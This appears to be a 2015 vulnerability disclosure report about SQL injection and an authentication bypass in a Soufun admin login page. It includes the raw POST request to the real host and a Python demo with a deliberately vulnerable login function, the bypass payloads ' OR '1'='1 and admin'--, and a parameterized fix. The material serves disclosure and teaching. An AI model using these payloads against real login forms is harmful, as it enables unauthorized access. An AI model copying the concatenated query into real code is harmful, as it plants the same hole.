Disclosure timeline:
2015-08-27: Details reported to the vendor, awaiting vendor handling
2015-08-27: Vendor confirmed; details disclosed to the vendor only
2015-09-06: Details disclosed to core white hats and relevant domain experts
2015-09-16: Details disclosed to regular white hats
2015-09-26: Details disclosed to intern white hats
2015-10-11: Details disclosed to the public
SQL injection in the login page of a Soufun (搜房网) admin backend
SQL injection on a Soufun site
SQL injection location
POST /hr/cgi-bin/admin/login.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://space2.soufun.com/hr/cgi-bin/admin/login.html
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: space2.soufun.com
Content-Length: 50
Pragma: no-cache
Cookie: global_cookie=4z1dz3kbyo7q3bhhige5fak9c1oidsemrt2; Hm_lvt_71c560ba10f46ed65ed494321dd51b24=1440570805; Hm_lpvt_71c560ba10f46ed65ed494321dd51b24=1440570826; cookiecitys=%B1%B1%BE%A9; Captcha=4B4932353243654C6E5563323446746C66753447725344775655797553633474366B66346643385572572B4B51506C4E2F505444536C41584537504D72434576434E38577673693566334A4F755748414E66363333413D3D; __utmt_t1=1; jiatxShopWindow=1; unique_cookie=U_4z1dz3kbyo7q3bhhige5fak9c1oidsemrt2*6; __utma=77873355.730920994.1440570754.1440570754.1440570754.1; __utmb=77873355.20.10.1440570754; __utmc=77873355; __utmz=77873355.1440570754.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic

uname=admin&pwd=123456&submit_s=%B5%C7%A1%A1%C2%BC

(The form body is GBK-encoded; submit_s carries the submit button's label and is not part of the finding.)
Injected parameter: uname
The same form can also be logged into directly with a "universal password" (an authentication-bypass string in the login fields).
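The two findings above (an injectable uname parameter, and a "universal password" that logs in through the same form) as an added, runnable illustration. This is editor-supplied example code, not the page's or Soufun's login.php, whose source is not shown: the admin_users table, the sample credentials and the string-concatenated query are assumptions that reconstruct the usual cause of this class of bug, with an in-memory SQLite database standing in for the real backend. It also shows the single-quote probe that typically surfaces such a parameter and the parameterized query that closes the hole.

```python
import sqlite3


def make_db():
    """Constructed sample data: a one-row admin table (not the real site's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_users (uname TEXT PRIMARY KEY, pwd TEXT)")
    conn.execute("INSERT INTO admin_users VALUES ('admin', 'S3cret!Real')")
    return conn


def vulnerable_login(conn, uname, pwd):
    """Hypothetical reconstruction of the flawed pattern: request fields are
    concatenated straight into the SQL text, so quotes in `uname` or `pwd`
    change the query's structure. Returns the matched username, or None."""
    sql = "SELECT uname FROM admin_users WHERE uname='%s' AND pwd='%s'" % (uname, pwd)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, uname, pwd):
    """Hardened form: placeholders carry the values as data, so the same
    payloads are compared literally against the stored columns."""
    sql = "SELECT uname FROM admin_users WHERE uname=? AND pwd=?"
    row = conn.execute(sql, (uname, pwd)).fetchone()
    return row[0] if row else None


def quote_probe(conn, login, uname):
    """The first check a tester runs on a login field: an unbalanced quote.
    Returns True if it breaks the query (an error leaks back), which is the
    classic sign that the parameter is injectable."""
    try:
        login(conn, uname, "x")
        return False
    except sqlite3.OperationalError:
        return True


# Two "universal password" shapes that bypass the concatenated query:
#  - comment out the password check after a known username
#  - make the whole WHERE clause true via OR, in both fields
COMMENT_BYPASS = ("admin'-- ", "wrong")          # trailing space keeps MySQL-style -- valid too
OR_BYPASS = ("' OR '1'='1", "' OR '1'='1")


def demo():
    """Run both login variants against the probe and the bypass payloads."""
    conn = make_db()
    return {
        "probe_vulnerable": quote_probe(conn, vulnerable_login, "admin'"),
        "probe_safe": quote_probe(conn, safe_login, "admin'"),
        "comment_bypass_vulnerable": vulnerable_login(conn, *COMMENT_BYPASS),
        "comment_bypass_safe": safe_login(conn, *COMMENT_BYPASS),
        "or_bypass_vulnerable": vulnerable_login(conn, *OR_BYPASS),
        "or_bypass_safe": safe_login(conn, *OR_BYPASS),
        "real_creds_safe": safe_login(conn, "admin", "S3cret!Real"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

In the vulnerable version both payloads return the admin row with the wrong password, and a lone quote raises a database error, which is what makes uname the reported injection point; the parameterized version neither errors nor matches, and still accepts the real credentials. The OR payload has to go in both fields because AND binds tighter than OR, so a single-field OR only short-circuits the username half of the clause.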
Fix suggestion: you have experts on staff.
Severity: Low
Vulnerability Rank: 3
Confirmed: 2015-08-27 19:35
Vendor response: Thank you for your attention to Soufun security. This site was abandoned years ago and has now been shut down.
None yet.